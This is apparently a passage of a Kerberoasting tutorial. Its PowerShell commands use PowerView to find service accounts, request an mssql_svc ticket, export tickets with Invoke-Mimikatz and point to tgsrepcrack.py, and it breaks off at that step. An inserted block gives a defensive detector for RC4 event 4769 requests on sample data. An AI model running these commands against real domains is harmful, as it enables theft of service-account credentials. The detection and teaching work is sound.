. .\powerview.ps1
Let’s list the users that run as service accounts (users with an SPN set):
Get-NetUser -SPN |select cn

Now let’s extract the service principal names:
Get-NetUser | Where-Object {$_.serviceprincipalname -ne $null} | select cn,serviceprincipalname

Okay, now let’s try to attack one of those services first and then script the others.
Attacking mssql_svc:
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "mssql_svc/mssqlserver.change.me"

Now let’s confirm that we have the TGS:
klist

As we can see, we have the ticket.
Now let’s use mimikatz to export all the tickets:
. .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"kerberos::list /export"'
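
From the detection side, each service ticket requested above is recorded on the domain controller as Security event 4769. The following is an added example (not from the original post) that filters such events for RC4 (0x17) tickets issued for user-run service accounts. The sample events, the requester accounts, the http_svc and FILE01$ names, and the Find-RoastLikeTicketRequest function name are constructed for illustration.

```powershell
# Added example: constructed 4769 (Kerberos service ticket requested) records.
# Field names match the event's EventData; all values are sample data.
$sampleEvents = @(
    [pscustomobject]@{ TargetUserName='alice@CHANGE.ME'; ServiceName='mssql_svc'; TicketEncryptionType='0x17'; Status='0x0'; IpAddress='::ffff:10.0.0.50' }
    [pscustomobject]@{ TargetUserName='alice@CHANGE.ME'; ServiceName='http_svc';  TicketEncryptionType='0x17'; Status='0x0'; IpAddress='::ffff:10.0.0.50' }
    [pscustomobject]@{ TargetUserName='bob@CHANGE.ME';   ServiceName='mssql_svc'; TicketEncryptionType='0x12'; Status='0x0'; IpAddress='::ffff:10.0.0.61' }
    [pscustomobject]@{ TargetUserName='bob@CHANGE.ME';   ServiceName='FILE01$';   TicketEncryptionType='0x17'; Status='0x0'; IpAddress='::ffff:10.0.0.61' }
)

function Find-RoastLikeTicketRequest {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        # Distinct service accounts per requester that marks a burst (assumed threshold).
        [int] $DistinctServiceThreshold = 2
    )

    $rc4 = $Events | Where-Object {
        $_.Status -eq '0x0' -and                                        # ticket was issued
        [Convert]::ToInt32($_.TicketEncryptionType, 16) -eq 0x17 -and   # RC4-HMAC
        $_.ServiceName -notlike '*$' -and                               # skip computer accounts
        $_.ServiceName -ne 'krbtgt'
    }

    # One row per requester and source address, with the services it asked for.
    $rc4 | Group-Object TargetUserName, IpAddress | ForEach-Object {
        $services = @($_.Group.ServiceName | Sort-Object -Unique)
        [pscustomobject]@{
            Requester  = $_.Group[0].TargetUserName
            Source     = $_.Group[0].IpAddress
            Rc4Tickets = $_.Count
            Services   = $services -join ','
            Burst      = $services.Count -ge $DistinctServiceThreshold
        }
    }
}

Find-RoastLikeTicketRequest -Events $sampleEvents | Format-Table -AutoSize
```

On a domain controller the same filter applies to records read with Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4769}, once the EventData fields are pulled out of each record's XML.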

Now let’s use tgsrepcrack.py